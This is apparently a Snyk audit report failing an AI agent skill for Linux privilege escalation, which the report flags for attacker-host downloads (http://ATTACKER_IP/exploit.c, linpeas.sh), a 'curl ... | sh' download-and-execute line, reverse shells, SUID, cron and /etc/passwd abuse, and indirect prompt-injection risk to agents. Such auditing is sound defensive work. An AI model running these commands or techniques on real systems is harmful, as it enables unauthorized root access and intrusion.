Skills
skills/claudiodearaujo/izacenter/Linux Privilege Escalation/Snyk

Linux Privilege Escalation

Fail

Audited by Snyk on Mar 10, 2026

Risk Level: CRITICAL
Full Analysis

CRITICAL E005: Suspicious download URL detected in skill instructions.

  • Suspicious download URL detected (high risk: 0.95). Highly suspicious: the list includes attacker-controlled URLs serving direct source/executable files (http://ATTACKER_IP/exploit.c and http://ATTACKER_IP:8000/linpeas.sh) alongside direct-download .sh scripts and exploit tooling — all of which can deliver and execute arbitrary code, even though some GitHub/GTFOBins links are legitimate resources.

CRITICAL E006: Malicious code pattern detected in skill scripts.

  • Malicious code pattern detected (high risk: 1.00). This content is an explicit, actionable playbook for unauthorized Linux privilege escalation and persistent remote access (reverse shells, sudo/SUID/cron/NFS abuse, kernel exploits, payload hosting), indicating clear malicious/backdoor intent.

MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).

  • Third-party content exposure detected (high risk: 0.90). The skill's Phase 2 and other workflow steps explicitly instruct fetching and running public third-party resources (e.g., curl/wget of linpeas.sh from GitHub, references to GTFOBins and exploit-db/searchsploit) and to use the resulting output to choose and execute exploits, so untrusted web-hosted content would be ingested and could materially influence actions.

MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).

  • Potentially malicious external URL detected (high risk: 1.00). The skill explicitly runs remote install/exec commands such as "curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh" (and uses wget to fetch exploit source like http://ATTACKER_IP/exploit.c), which downloads and executes external code at runtime and is presented as a required enumeration/exploitation dependency.

MEDIUM W013: Attempt to modify system services in skill instructions.

  • Attempt to modify system services in skill instructions detected (high risk: 1.00). This skill explicitly instructs enumeration and exploitation techniques to obtain root (compile/execute kernel exploits, create SUID binaries, modify /etc/passwd and cron scripts, add users, and launch reverse shells), which directs the agent to modify the machine's state and bypass security controls.
Audit Metadata
Risk Level
CRITICAL
Analyzed
Mar 10, 2026, 01:14 AM